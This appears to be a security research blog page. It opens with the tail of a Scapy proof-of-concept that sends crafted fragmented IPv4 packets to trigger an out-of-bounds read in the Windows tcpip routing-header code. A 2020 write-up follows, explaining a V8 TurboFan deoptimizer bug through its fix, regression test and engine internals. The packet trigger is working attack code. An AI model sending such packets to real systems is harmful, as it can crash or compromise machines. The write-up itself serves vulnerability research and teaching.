// ffffdc07ff209170  ff ff 04 00 61 62 63 00-54 24 30 48 89 14 01 48  ....abc.T$0H...H RoutingHeaderFirst = NdisGetDataBuffer(FirstNetBuffer, Packet->RoutingHeaderOptionLength, &v50[0].qw2, 1u, 0); NetioAdvanceNetBufferList(NetBufferList, v8); OptionLenFirst = RoutingHeaderFirst[1]; LenghtOptionFirstMinusOne = (unsigned int)(unsigned __int8)RoutingHeaderFirst[2] - 1; RoutingOptionOffset = LOBYTE(Packet->RoutingOptionOffset); if (OptionLenFirst < 7u || LenghtOptionFirstMinusOne > OptionLenFirst - sizeof(IN_ADDR)) { // ... goto Bail_0; } // ... ''' id = random.randint(0, 0xff) # dst_ip isn't a broadcast IP because otherwise we fail a check in # Ipv4pReceiveRoutingHeader; if we don't take the below branch # we don't hit the interesting bits later: # if (Packet->CurrentDestinationType == NlatUnicast) { # v12 = &RoutingHeaderFirst[LenghtOptionFirstMinusOne]; dst_ip = '192.168.2.137' src_ip = '120.120.120.0' # UDP nh = 17 content = bytes(UDP(sport = 31337, dport = 31338) / '1') one = Ether() \ / IP( src = src_ip, dst = dst_ip, flags = 1, proto = nh, frag = 0, id = id, options = [IPOption_Security( length = 0xb, security = 0x11, # This is used for as an ~upper bound in Ipv4pReceiveRoutingHeader: compartment = 0xffff, # This is the offset that allows us to index out of the # bounds of the second fragment. # Keep in mind that, the out of bounds data is first used # before triggering any corruption (in Ipv4pReceiveRoutingHeader): # - IppIsInvalidSourceAddressStrict, # - Ipv4UnicastAddressScope. # if (IppIsInvalidSourceAddressStrict(Ipv4Global, &RoutingHeaderFirst[LenghtOptionFirstMinusOne]) # || (Ipv4UnicastAddressScope(&RoutingHeaderFirst[LenghtOptionFirstMinusOne]), # v13 = Ipv4UnicastAddressScope(&Packet->RoutingOptionSourceIp), # v14 < v13) ) # The upper byte of handling_restrictions is RoutingHeaderFirst[2] in the above snippet # Offset of 6 allows us to have &RoutingHeaderFirst[LenghtOptionFirstMinusOne] pointing on # one.IP.options.transmission_control_code; last byte is OOB. # kd> # tcpip!Ipv4pReceiveRoutingHeader+0x178: # fffff8045c076f88 e8d7e1feff call tcpip!IppIsInvalidSourceAddressStrict (fffff8045c065164) # kd> db @rdx # ffffdc07ff209175 62 63 00 54 24 30 48 89-14 01 48 c0 92 20 ff 07 bc.T$0H...H.. ..
#                                ^
#                                |_ oob
handling_restrictions = (6 << 8),
transmission_control_code = b'\x11\xc1\xa8'
)]
) / content[: 8]
two = Ether() \
/ IP(
src = src_ip,
dst = dst_ip,
flags = 0,
proto = nh,
frag = 1,
id = id,
options = [
IPOption_NOP(),
IPOption_NOP(),
IPOption_NOP(),
IPOption_NOP(),
IPOption_LSRR(
pointer = 0x8,
routers = ['11.22.33.44']
),
]
) / content[8: ]

sendp([one, two], iface='eth1')

def main():
parser = argparse.ArgumentParser()
args = parser.parse_args()
trigger(args)
return

if __name__ == '__main__':
main()


Modern attacks on the Chrome browser : optimizations and deoptimizations

17 November 2020 at 08:00

Introduction

Late 2019, I presented at an internal Azimuth Security conference some work on hacking Chrome through it's JavaScript engine.

One of the topics I've been playing with at that time was deoptimization and so I discussed, among others, vulnerabilities in the deoptimizer. For my talk at InfiltrateCon 2020 in Miami I was planning to discuss several components of V8. One of them was the deoptimizer. But as you all know, things didn't quite go as expected this year and the event has been postponed several times.

This blog post is actually an internal write-up I made for Azimuth Security a year ago and we decided to finally release it publicly.

Also, if you want to get serious about breaking browsers and feel like joining us, we're currently looking for experienced hackers (US/AU/UK/FR or anywhere else remotely). Feel free to reach out on twitter or by e-mail.

Special thanks to the legendary Mark Dowd and John McDonald for letting me publish this here.

For those unfamiliar with TurboFan, you may want to read an Introduction to TurboFan first. Also, Benedikt Meurer gave a lot of very interesting talks that are strongly recommended to anyone interested in better understanding V8's internals.

Motivation

The commit

To understand this security bug, it is necessary to delve into V8's internals.

Fixes word64-lowered BigInt in FrameState accumulator

Bug: chromium:1016450
Change-Id: I4801b5ffb0ebea92067aa5de37e11a4e75dcd3c0
Reviewed-by: Georg Neis <[email protected]>
Commit-Queue: Nico Hartmann <[email protected]>


It fixes VisitFrameState and VisitStateValues in src/compiler/simplified-lowering.cc.

diff --git a/src/compiler/simplified-lowering.cc b/src/compiler/simplified-lowering.cc
index 2e8f40f..abbdae3 100644
--- a/src/compiler/simplified-lowering.cc
+++ b/src/compiler/simplified-lowering.cc
@@ -1197,7 +1197,7 @@
// TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
// truncated BigInts.
if (TypeOf(input).Is(Type::BigInt())) {
-          ProcessInput(node, i, UseInfo::AnyTagged());
+          ConvertInput(node, i, UseInfo::AnyTagged());
}

(*types)[i] =
@@ -1220,11 +1220,22 @@
// Accumulator is a special flower - we need to remember its type in
// a singleton typed-state-values node (as if it was a singleton
// state-values node).
+    Node* accumulator = node->InputAt(2);
if (propagate()) {
-      EnqueueInput(node, 2, UseInfo::Any());
+      // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+      // truncated BigInts.
+      if (TypeOf(accumulator).Is(Type::BigInt())) {
+        EnqueueInput(node, 2, UseInfo::AnyTagged());
+      } else {
+        EnqueueInput(node, 2, UseInfo::Any());
+      }
} else if (lower()) {
+      // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+      // truncated BigInts.
+      if (TypeOf(accumulator).Is(Type::BigInt())) {
+        ConvertInput(node, 2, UseInfo::AnyTagged());
+      }
Zone* zone = jsgraph_->zone();
-      Node* accumulator = node->InputAt(2);
if (accumulator == jsgraph_->OptimizedOutConstant()) {
} else {
@@ -1237,7 +1248,7 @@
node->ReplaceInput(
2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
-                                          accumulator));
+                                          node->InputAt(2)));
}
}


This can be linked to a different commit that adds a related regression test:

Regression test for word64-lowered BigInt accumulator

This issue was fixed in https://chromium-review.googlesource.com/c/v8/v8/+/1873692

Bug: chromium:1016450
Change-Id: I56e1c504ae6876283568a88a9aa7d24af3ba6474
Commit-Queue: Nico Hartmann <[email protected]>
Auto-Submit: Nico Hartmann <[email protected]>
Reviewed-by: Jakob Gruber <[email protected]>
Reviewed-by: Georg Neis <[email protected]>

// Copyright 2019 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

// Flags: --allow-natives-syntax --opt --no-always-opt

let g = 0;

function f(x) {
let y = BigInt.asUintN(64, 15n);
// Introduce a side effect to force the construction of a FrameState that
// captures the value of y.
g = 42;
try {
return x + y;
} catch(_) {
return y;
}
}

%PrepareFunctionForOptimization(f);
assertEquals(16n, f(1n));
assertEquals(17n, f(2n));
%OptimizeFunctionOnNextCall(f);
assertEquals(16n, f(1n));
assertOptimized(f);
assertEquals(15n, f(0));
assertUnoptimized(f);


Long story short

This vulnerability is a bug in the way the simplified lowering phase of TurboFan deals with FrameState and StateValues nodes. Those nodes are related to deoptimization.

During the code generation phase, using those nodes, TurboFan builds deoptimization input data that are used when the runtime bails out to the deoptimizer.

Because after a deoptimizaton execution goes from optimized native code back to interpreted bytecode, the deoptimizer needs to know where to deoptimize to (ex: which bytecode offset?) and how to build a correct frame (ex: what ignition registers?). To do that, the deoptimizer uses those deoptimization input data built during code generation.

Using this bug, it is possible to make code generation incorrectly build deoptimization input data so that the deoptimizer will materialize a fake object. Then, it redirects the execution to an ignition bytecode handler that has an arbitrary object pointer referenced by its accumulator register.

Internals

To understand this bug, we want to know:

• what is ignition (because we deoptimize back to ignition)
• what is simplified lowering (because that's where the bug is)
• what is a deoptimization (because it is impacted by the bug and will materialize a fake object for us)

Ignition

Overview

V8 features an interpreter called Ignition. It uses TurboFan's macro-assembler. This assembler is architecture-independent and TurboFan is responsible for compiling these instructions down to the target architecture.

Ignition is a register machine. That means opcode's inputs and output are using only registers. There is an accumulator used as an implicit operand for many opcodes.

For every opcode, an associated handler is generated. Therefore, executing bytecode is mostly a matter of fetching the current opcode and dispatching it to the correct handler.

Let's observe the bytecode for a simple JavaScript function.

let opt_me = (o, val) => {
let value = val + 42;
o.x = value;
}
opt_me({x:1.1});


Using the --print-bytecode and --print-bytecode-filter=opt_me flags we can dump the corresponding generated bytecode.

Parameter count 3
Register count 1
Frame size 8
13 E> 0000017DE515F366 @    0 : a5                StackCheck
41 S> 0000017DE515F367 @    1 : 25 02             Ldar a1
45 E> 0000017DE515F369 @    3 : 40 2a 00          AddSmi [42], [0]
0000017DE515F36C @    6 : 26 fb             Star r0
53 S> 0000017DE515F36E @    8 : 25 fb             Ldar r0
57 E> 0000017DE515F370 @   10 : 2d 03 00 01       StaNamedProperty a0, [0], [1]
0000017DE515F374 @   14 : 0d                LdaUndefined
67 S> 0000017DE515F375 @   15 : a9                Return
Constant pool (size = 1)
0000017DE515F319: [FixedArray] in OldSpace
- map: 0x00d580740789 <Map>
- length: 1
0: 0x017de515eff9 <String[#1]: x>
Handler Table (size = 0)


Disassembling the function shows that the low level code is merely a trampoline to the interpreter entry point. In our case, running an x64 build, that means the trampoline jumps to the code generated by Builtins::Generate_InterpreterEntryTrampoline in src/builtins/x64/builtins-x64.cc.

d8> %DisassembleFunction(opt_me)
0000008C6B5043C1: [Code]
- map: 0x02ebfe8409b9 <Map>
kind = BUILTIN
name = InterpreterEntryTrampoline
compiler = unknown

Trampoline (size = 13)
0000008C6B504400     0  49ba80da52b0fd7f0000 REX.W movq r10,00007FFDB052DA80  (InterpreterEntryTrampoline)
0000008C6B50440A     a  41ffe2         jmp r10


This code simply fetches the instructions from the function's BytecodeArray and executes the corresponding ignition handler from a dispatch table.

d8> %DebugPrint(opt_me)
DebugPrint: 000000FD8C6CA819: [Function]
// ...
- code: 0x01524c1c43c1 <Code BUILTIN InterpreterEntryTrampoline>
- interpreted
- bytecode: 0x01b76929f331 <BytecodeArray[16]>
// ...


Below is the part of Builtins::Generate_InterpreterEntryTrampoline that loads the address of the dispatch table into the kInterpreterDispatchTableRegister. Then it selects the current opcode using the kInterpreterBytecodeOffsetRegister and kInterpreterBytecodeArrayRegister. Finally, it computes kJavaScriptCallCodeStartRegister = dispatch_table[bytecode * pointer_size] and then calls the handler. Those registers are described in src\codegen\x64\register-x64.h.

  // Load the dispatch table into a register and dispatch to the bytecode
// handler at the current bytecode offset.
Label do_dispatch;
__ bind(&do_dispatch);
__ Move(
kInterpreterDispatchTableRegister,
__ movzxbq(r11, Operand(kInterpreterBytecodeArrayRegister,
kInterpreterBytecodeOffsetRegister, times_1, 0));
__ movq(kJavaScriptCallCodeStartRegister,
Operand(kInterpreterDispatchTableRegister, r11,
times_system_pointer_size, 0));
__ call(kJavaScriptCallCodeStartRegister);
masm->isolate()->heap()->SetInterpreterEntryReturnPCOffset(masm->pc_offset());

// Any returns to the entry trampoline are either due to the return bytecode
// or the interpreter tail calling a builtin and then a dispatch.

// Get bytecode array and bytecode offset from the stack frame.
__ movq(kInterpreterBytecodeArrayRegister,
Operand(rbp, InterpreterFrameConstants::kBytecodeArrayFromFp));
__ movq(kInterpreterBytecodeOffsetRegister,
Operand(rbp, InterpreterFrameConstants::kBytecodeOffsetFromFp));
__ SmiUntag(kInterpreterBytecodeOffsetRegister,
kInterpreterBytecodeOffsetRegister);

// Either return, or advance to the next bytecode and dispatch.
Label do_return;
__ movzxbq(rbx, Operand(kInterpreterBytecodeArrayRegister,
kInterpreterBytecodeOffsetRegister, times_1, 0));
kInterpreterBytecodeOffsetRegister, rbx, rcx,
&do_return);
__ jmp(&do_dispatch);


Ignition handlers

Ignitions handlers are implemented in src/interpreter/interpreter-generator.cc. They are declared using the IGNITION_HANDLER macro. Let's look at a few examples.

Below is the implementation of JumpIfTrue. The careful reader will notice that it is actually similar to the Code Stub Assembler code (used to implement some of the builtins).

// JumpIfTrue <imm>
//
// Jump by the number of bytes represented by an immediate operand if the
// accumulator contains true. This only works for boolean inputs, and
// will misbehave if passed arbitrary input values.
IGNITION_HANDLER(JumpIfTrue, InterpreterAssembler) {
Node* accumulator = GetAccumulator();
Node* relative_jump = BytecodeOperandUImmWord(0);
CSA_ASSERT(this, TaggedIsNotSmi(accumulator));
CSA_ASSERT(this, IsBoolean(accumulator));
JumpIfWordEqual(accumulator, TrueConstant(), relative_jump);
}


Binary instructions making use of inline caching actually execute code implemented in src/ic/binary-op-assembler.cc.

// AddSmi <imm>
//
// Adds an immediate value <imm> to the value in the accumulator.
}

void BinaryOpWithFeedback(BinaryOpGenerator generator) {
Node* rhs = GetAccumulator();
Node* context = GetContext();
Node* slot_index = BytecodeOperandIdx(1);

BinaryOpAssembler binop_asm(state());
Node* result = (binop_asm.*generator)(context, lhs, rhs, slot_index,
maybe_feedback_vector, false);
SetAccumulator(result);
Dispatch();
}


From this code, we understand that when executing AddSmi [42], [0], V8 ends-up executing code generated by BinaryOpAssembler::Generate_AddWithFeedback. The left hand side of the addition is the operand 0 ([42] in this case), the right hand side is loaded from the accumulator register. It also loads a slot from the feedback vector using the index specified in operand 1. The result of the addition is stored in the accumulator.

It is interesting to point out to observe the call to Dispatch. We may expect that every handler is called from within the do_dispatch label of InterpreterEntryTrampoline whereas actually the current ignition handler may do the dispatch itself (and thus does not directly go back to the do_dispatch)

Debugging

There is a built-in feature for debugging ignition bytecode that you can enable by switching v8_enable_trace_ignition to true and recompile the engine. You may also want to change v8_enable_trace_feedbacks.

This unlocks some interesting flags in the d8 shell such as:

• --trace-ignition

There are also a few interesting runtime functions:

• Runtime_InterpreterTraceBytecodeEntry
• prints ignition registers before executing an opcode
• Runtime_InterpreterTraceBytecodeExit
• prints ignition registers after executing an opcode
• Runtime_InterpreterTraceUpdateFeedback
• displays updates to the feedback vector slots

Let's try debugging a simple add function.

function add(a,b) {
return a + b;
}


We can now see a dump of ignition registers at every step of the execution using --trace-ignition.

      [          r1 -> 0x193680a1f8e9 <JSFunction add (sfi = 0x193680a1f759)> ]
[          r2 -> 0x3ede813004a9 <undefined> ]
[          r3 -> 42 ]
[          r4 -> 1 ]
-> 0x193680a1fa56 @    0 : a5                StackCheck
-> 0x193680a1fa57 @    1 : 25 02             Ldar a1
[          a1 -> 1 ]
[ accumulator <- 1 ]
-> 0x193680a1fa59 @    3 : 34 03 00          Add a0, [0]
[ accumulator -> 1 ]
[          a0 -> 42 ]
[ accumulator <- 43 ]
-> 0x193680a1fa5c @    6 : a9                Return
[ accumulator -> 43 ]
-> 0x193680a1f83a @   36 : 26 fb             Star r0
[ accumulator -> 43 ]
[          r0 <- 43 ]
-> 0x193680a1f83c @   38 : a9                Return
[ accumulator -> 43 ]


Simplified lowering

Simplified lowering is actually divided into three main phases :

1. The truncation propagation phase (RunTruncationPropagationPhase)
• backward propagation of truncations
2. The type propagation phase (RunTypePropagationPhase)
• forward propagation of types from type feedback
3. The lowering phase (Run, after calling the previous phases)
• may lower nodes
• may insert conversion nodes

To get a better understanding, we'll study the evolution of the sea of nodes graph for the function below :

function f(a) {
if (a) {
var x = 2;
}
else {
var x = 5;
}
return 0x42 % x;
}
%PrepareFunctionForOptimization(f);
f(true);
f(false);
%OptimizeFunctionOnNextCall(f);
f(true);


Propagating truncations

To understand how truncations get propagated, we want to trace the simplified lowering using --trace-representation and look at the sea of nodes in Turbolizer right before the simplified lowering phase, which is by selecting the escape analysis phase in the menu.

The first phase starts from the End node. It visits the node and then enqueues its inputs. It doesn't truncate any of its inputs. The output is tagged.

 visit #31: End (trunc: no-value-use)
initial #30: no-value-use

  void VisitNode(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
// ...
case IrOpcode::kEnd:
// ...
case IrOpcode::kJSParseInt:
VisitInputs(node);
// Assume the output is tagged.
return SetOutput(node, MachineRepresentation::kTagged);


Then, for every node in the queue, the corresponding visitor is called. In that case, only a Return node is in the queue.

The visitor indicates use informations. The first input is truncated to a word32. The other inputs are not truncated. The output is tagged.

  void VisitNode(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
// ...
switch (node->opcode()) {
// ...
case IrOpcode::kReturn:
VisitReturn(node);
// Assume the output is tagged.
return SetOutput(node, MachineRepresentation::kTagged);
// ...
}
}

void VisitReturn(Node* node) {
int tagged_limit = node->op()->ValueInputCount() +
OperatorProperties::GetContextInputCount(node->op()) +
OperatorProperties::GetFrameStateInputCount(node->op());
// Visit integer slot count to pop
ProcessInput(node, 0, UseInfo::TruncatingWord32());

// Visit value, context and frame state inputs as tagged.
for (int i = 1; i < tagged_limit; i++) {
ProcessInput(node, i, UseInfo::AnyTagged());
}
// Only enqueue other inputs (effects, control).
for (int i = tagged_limit; i < node->InputCount(); i++) {
EnqueueInput(node, i);
}
}


In the trace, we indeed observe that the End node didn't propagate any truncation to the Return node. However, the Return node does truncate its first input.

 visit #30: Return (trunc: no-value-use)
initial #29: truncate-to-word32
initial #28: no-truncation (but distinguish zeros)
queue #28?: no-truncation (but distinguish zeros)
initial #21: no-value-use


All the inputs (29, 28 21) are set in the queue and now have to be visited.

We can see that the truncation to word32 has been propagated to the node 29.

 visit #29: NumberConstant (trunc: truncate-to-word32)


When visiting the node 28, the visitor for SpeculativeNumberModulus, in that case, decides that the first two inputs should get truncated to word32.

 visit #28: SpeculativeNumberModulus (trunc: no-truncation (but distinguish zeros))
initial #24: truncate-to-word32
initial #23: truncate-to-word32
initial #13: no-value-use
queue #21?: no-value-use


Indeed, if we look at the code of the visitor, if both inputs are typed as Type::Unsigned32OrMinusZeroOrNaN(), which is the case since they are typed as Range(66,66) and Range(2,5) , and the node truncation is a word32 truncation (not the case here since there is no truncation) or the node is typed as Type::Unsigned32() (true because the node is typed as Range(0,4)) then, a call to VisitWord32TruncatingBinop is made.

This visitor indicates a truncation to word32 on the first two inputs and sets the output representation to Any. It also add all the inputs to the queue.

  void VisitSpeculativeNumberModulus(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
if (BothInputsAre(node, Type::Unsigned32OrMinusZeroOrNaN()) &&
(truncation.IsUsedAsWord32() ||
NodeProperties::GetType(node).Is(Type::Unsigned32()))) {
// => unsigned Uint32Mod
VisitWord32TruncatingBinop(node);
if (lower()) DeferReplacement(node, lowering->Uint32Mod(node));
return;
}
// ...
}

void VisitWord32TruncatingBinop(Node* node) {
VisitBinop(node, UseInfo::TruncatingWord32(),
MachineRepresentation::kWord32);
}

// Helper for binops of the I x I -> O variety.
void VisitBinop(Node* node, UseInfo input_use, MachineRepresentation output,
Type restriction_type = Type::Any()) {
VisitBinop(node, input_use, input_use, output, restriction_type);
}

// Helper for binops of the R x L -> O variety.
void VisitBinop(Node* node, UseInfo left_use, UseInfo right_use,
MachineRepresentation output,
Type restriction_type = Type::Any()) {
DCHECK_EQ(2, node->op()->ValueInputCount());
ProcessInput(node, 0, left_use);
ProcessInput(node, 1, right_use);
for (int i = 2; i < node->InputCount(); i++) {
EnqueueInput(node, i);
}
SetOutput(node, output, restriction_type);
}


For the next node in the queue (#21), the visitor doesn't indicate any truncation.

 visit #21: Merge (trunc: no-value-use)
initial #19: no-value-use
initial #17: no-value-use


It simply adds its own inputs to the queue and indicates that this Merge node has a kTagged output representation.

  void VisitNode(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
// ...
case IrOpcode::kMerge:
// ...
case IrOpcode::kJSParseInt:
VisitInputs(node);
// Assume the output is tagged.
return SetOutput(node, MachineRepresentation::kTagged);


The SpeculativeNumberModulus node indeed propagated a truncation to word32 to its inputs 24 (NumberConstant) and 23 (Phi).

 visit #24: NumberConstant (trunc: truncate-to-word32)
visit #23: Phi (trunc: truncate-to-word32)
initial #20: truncate-to-word32
initial #22: truncate-to-word32
queue #21?: no-value-use
visit #13: JSStackCheck (trunc: no-value-use)
initial #12: no-truncation (but distinguish zeros)
initial #14: no-truncation (but distinguish zeros)
initial #6: no-value-use
initial #0: no-value-use


Now let's have a look at the phi visitor. It simply forwards the propagations to its inputs and adds them to the queue. The output representation is inferred from the phi node's type.

  // Helper for handling phis.
void VisitPhi(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
MachineRepresentation output =
GetOutputInfoForPhi(node, TypeOf(node), truncation);
// Only set the output representation if not running with type
// feedback. (Feedback typing will set the representation.)
SetOutput(node, output);

int values = node->op()->ValueInputCount();
if (lower()) {
// Update the phi operator.
if (output != PhiRepresentationOf(node->op())) {
NodeProperties::ChangeOp(node, lowering->common()->Phi(output, values));
}
}

// Convert inputs to the output representation of this phi, pass the
// truncation along.
UseInfo input_use(output, truncation);
for (int i = 0; i < node->InputCount(); i++) {
ProcessInput(node, i, i < values ? input_use : UseInfo::None());
}
}


Finally, the phi node's inputs get visited.

 visit #20: NumberConstant (trunc: truncate-to-word32)
visit #22: NumberConstant (trunc: truncate-to-word32)


They don't have any inputs to enqueue. Output representation is set to tagged signed.

      case IrOpcode::kNumberConstant: {
double const value = OpParameter<double>(node->op());
int value_as_int;
if (DoubleToSmiInteger(value, &value_as_int)) {
VisitLeaf(node, MachineRepresentation::kTaggedSigned);
if (lower()) {
intptr_t smi = bit_cast<intptr_t>(Smi::FromInt(value_as_int));
DeferReplacement(node, lowering->jsgraph()->IntPtrConstant(smi));
}
return;
}
VisitLeaf(node, MachineRepresentation::kTagged);
return;
}


We've unrolled enough of the algorithm by hand to understand the first truncation propagation phase. Let's have a look at the type propagation phase.

Please note that a visitor may behave differently according to the phase that is currently being executing.

  bool lower() const { return phase_ == LOWER; }
bool retype() const { return phase_ == RETYPE; }
bool propagate() const { return phase_ == PROPAGATE; }


That's why the NumberConstant visitor does not trigger a DeferReplacement during the truncation propagation phase.

Retyping

There isn't so much to say about the retyping phase. Starting from the End node, every node of the graph is put in a stack. Then, starting from the top of the stack, types are updated with UpdateFeedbackType and revisited. This allows to forward propagate updated type information (starting from the Start, not the End).

As we can observe by tracing the phase, that's when final output representations are computed and displayed :

 visit #29: NumberConstant
==> output kRepTaggedSigned


For nodes 23 (phi) and 28 (SpeculativeNumberModulus), there is also an updated feedback type.

#23:Phi[kRepTagged](#20:NumberConstant, #22:NumberConstant, #21:Merge)  [Static type: Range(2, 5)]
visit #23: Phi
==> output kRepWord32

#28:SpeculativeNumberModulus[SignedSmall](#24:NumberConstant, #23:Phi, #13:JSStackCheck, #21:Merge)  [Static type: Range(0, 4)]
visit #28: SpeculativeNumberModulus
==> output kRepWord32


Lowering and inserting conversions

Now that every node has been associated with use informations for every input as well as an output representation, the last phase consists in :

• lowering the node itself to a more specific one (via a DeferReplacement for instance)
• converting nodes when the output representation of an input doesn't match with the expected use information for this input (could be done with ConvertInput)

Note that a node won't necessarily change. There may not be any lowering and/or any conversion.

Let's get through the evolution of a few nodes. The NumberConstant #29 will be replaced by the Int32Constant #41. Indeed, the output of the NumberConstant @29 has a kRepTaggedSigned representation. However, because it is used as its first input, the Return node wants it to be truncated to word32. Therefore, the node will get converted. This is done by the ConvertInput function. It will itself call the representation changer via the function GetRepresentationFor. Because the truncation to word32 is requested, execution is redirected to RepresentationChanger::GetWord32RepresentationFor which then calls MakeTruncatedInt32Constant.

Node* RepresentationChanger::MakeTruncatedInt32Constant(double value) {
return jsgraph()->Int32Constant(DoubleToInt32(value));
}


visit #30: Return
change: #30:Return(@0 #29:NumberConstant)  from kRepTaggedSigned to kRepWord32:truncate-to-word32


For the second input of the Return node, the use information indicates a tagged representation and no truncation. However, the second input (SpeculativeNumberModulus #28) has a kRepWord32 output representation. Again, it doesn't match and when calling ConvertInput the representation changer will be used. This time, the function used is RepresentationChanger::GetTaggedRepresentationFor. If the type of the input (node #28) is a Signed31, then TurboFan knows it can use a ChangeInt31ToTaggedSigned operator to make the conversion. This is the case here because the type computed for node 28 is Range(0,4).

// ...
else if (IsWord(output_rep)) {
if (output_type.Is(Type::Signed31())) {
op = simplified()->ChangeInt31ToTaggedSigned();
}


visit #30: Return
change: #30:Return(@1 #28:SpeculativeNumberModulus)  from kRepWord32 to kRepTagged:no-truncation (but distinguish zeros)


The last example we'll go through is the case of the SpeculativeNumberModulus node itself.

 visit #28: SpeculativeNumberModulus
change: #28:SpeculativeNumberModulus(@0 #24:NumberConstant)  from kRepTaggedSigned to kRepWord32:truncate-to-word32
// (comment) from #24:NumberConstant to #44:Int32Constant
defer replacement #28:SpeculativeNumberModulus with #60:Phi


If we compare the graph (well, a subset), we can observe :

• the insertion of the ChangeInt31ToTaggedSigned (#42), in the blue rectangle
• the original inputs of node #28, before simplified lowering, are still there but attached to other nodes (orange rectangle)
• node #28 has been replaced by the phi node #60 ... but it also leads to the creation of all the other nodes in the orange rectangle

This is before simplified lowering :

This is after :

The creation of all the nodes inside the green rectangle is done by SimplifiedLowering::Uint32Mod which is called by the SpeculativeNumberModulus visitor.

  void VisitSpeculativeNumberModulus(Node* node, Truncation truncation,
SimplifiedLowering* lowering) {
if (BothInputsAre(node, Type::Unsigned32OrMinusZeroOrNaN()) &&
(truncation.IsUsedAsWord32() ||
NodeProperties::GetType(node).Is(Type::Unsigned32()))) {
// => unsigned Uint32Mod
VisitWord32TruncatingBinop(node);
if (lower()) DeferReplacement(node, lowering->Uint32Mod(node));
return;
}

Node* SimplifiedLowering::Uint32Mod(Node* const node) {
Uint32BinopMatcher m(node);
Node* const minus_one = jsgraph()->Int32Constant(-1);
Node* const zero = jsgraph()->Uint32Constant(0);
Node* const lhs = m.left().node();
Node* const rhs = m.right().node();

if (m.right().Is(0)) {
return zero;
} else if (m.right().HasValue()) {
return graph()->NewNode(machine()->Uint32Mod(), lhs, rhs, graph()->start());
}

// General case for unsigned integer modulus, with optimization for (unknown)
// power of 2 right hand side.
//
//   if rhs == 0 then
//     zero
//   else
//     msk = rhs - 1
//     if rhs & msk != 0 then
//       lhs % rhs
//     else
//       lhs & msk
//
// Note: We do not use the Diamond helper class here, because it really hurts
const Operator* const merge_op = common()->Merge(2);
const Operator* const phi_op =
common()->Phi(MachineRepresentation::kWord32, 2);

Node* check0 = graph()->NewNode(machine()->Word32Equal(), rhs, zero);
Node* branch0 = graph()->NewNode(common()->Branch(BranchHint::kFalse), check0,
graph()->start());

Node* if_true0 = graph()->NewNode(common()->IfTrue(), branch0);
Node* true0 = zero;

Node* if_false0 = graph()->NewNode(common()->IfFalse(), branch0);
Node* false0;
{
Node* msk = graph()->NewNode(machine()->Int32Add(), rhs, minus_one);

Node* check1 = graph()->NewNode(machine()->Word32And(), rhs, msk);
Node* branch1 = graph()->NewNode(common()->Branch(), check1, if_false0);

Node* if_true1 = graph()->NewNode(common()->IfTrue(), branch1);
Node* true1 = graph()->NewNode(machine()->Uint32Mod(), lhs, rhs, if_true1);

Node* if_false1 = graph()->NewNode(common()->IfFalse(), branch1);
Node* false1 = graph()->NewNode(machine()->Word32And(), lhs, msk);

if_false0 = graph()->NewNode(merge_op, if_true1, if_false1);
false0 = graph()->NewNode(phi_op, true1, false1, if_false0);
}

Node* merge0 = graph()->NewNode(merge_op, if_true0, if_false0);
return graph()->NewNode(phi_op, true0, false0, merge0);
}


A high level overview of deoptimization

Understanding deoptimization requires to study several components of V8 :

• instruction selection
• when descriptors for FrameState and StateValues nodes are built
• code generation
• when deoptimization input data are built (that includes a Translation)
• the deoptimizer
• at runtime, this is where execution is redirected to when "bailing out to deoptimization"
• uses the Translation
• translates from the current input frame (optimized native code) to the output interpreted frame (interpreted ignition bytecode)

When looking at the sea of nodes in Turbolizer, you may see different kind of nodes related to deoptimization such as :

• Checkpoint
• refers to a FrameState
• FrameState
• refers to a position and a state, takes StateValues as inputs
• StateValues
• state of parameters, local variables, accumulator
• Deoptimize / DeoptimizeIf / DeoptimizeUnless etc

There are several types of deoptimization :

• eager, when you deoptimize the current function on the spot
• you just triggered a type guard (ex: wrong map, thanks to a CheckMaps node)
• lazy, you deoptimize later
• another function just violated a code dependency (ex: a function call just made a map unstable, violating a stable map dependency)
• soft
• a function got optimized too early, more feedback is needed

We are only discussing the case where optimized assembly code deoptimizes to ignition interpreted bytecode, that is the constructed output frame is called an interpreted frame. However, there are other kinds of frames we are not going to discuss in this article (ex: adaptor frames, builtin continuation frames, etc). Michael Stanton, a V8 dev, wrote a few interesting blog posts you may want to check.

We know that javascript first gets translated to ignition bytecode (and a feedback vector is associated to that bytecode). Then, TurboFan might kick in and generate optimized code based on speculations (using the aforementioned feedback vector). It associates deoptimization input data to this optimized code. When executing optimized code, if an assumption is violated (let's say, a type guard for instance), the flow of execution gets redirected to the deoptimizer. The deoptimizer takes those deoptimization input data to translate the current input frame and compute an output frame. The deoptimization input data tell the deoptimizer what kind of deoptimization is to be done (for instance, are we going back to some standard ignition bytecode? That implies building an interpreted frame as an output frame). They also indicate where to deoptimize to (such as the bytecode offset), what values to put in the output frame and how to translate them. Finally, once everything is ready, it returns to the ignition interpreter.

During code generation, for every instruction that has a flag indicating a possible deoptimization, a branch is generated. It either branches to a continuation block (normal execution) or to a deoptimization exit to which is attached a Translation.

To build the translation, code generation uses information from structures such as a FrameStateDescriptor and a list of StateValueDescriptor. They obviously correspond to FrameState and StateValues nodes. Those structures are built during instruction selection, not when visiting those nodes (no code generation is directly associated to those nodes, therefore they don't have associated visitors in the instruction selector).

Tracing a deoptimization

Let's get through a quick experiment using the following script.

function add_prop(x) {
let obj = {};
obj[x] = 42;
}



Now run it using --turbo-profiling and --print-code-verbose.

This allows to dump the deoptimization input data :

Deoptimization Input Data (deopt points = 5)
index  bytecode-offset    pc  commands
0                0   269  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
INTERPRETED_FRAME {bytecode_offset=0, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, [email protected](#0)}
STACK_SLOT {input=3}
STACK_SLOT {input=-2}
STACK_SLOT {input=-1}
STACK_SLOT {input=4}
LITERAL {literal_id=2 (0x3ee5f5180df9 <Odd Oddball: optimized_out>)}
LITERAL {literal_id=2 (0x3ee5f5180df9 <Odd Oddball: optimized_out>)}

// ...

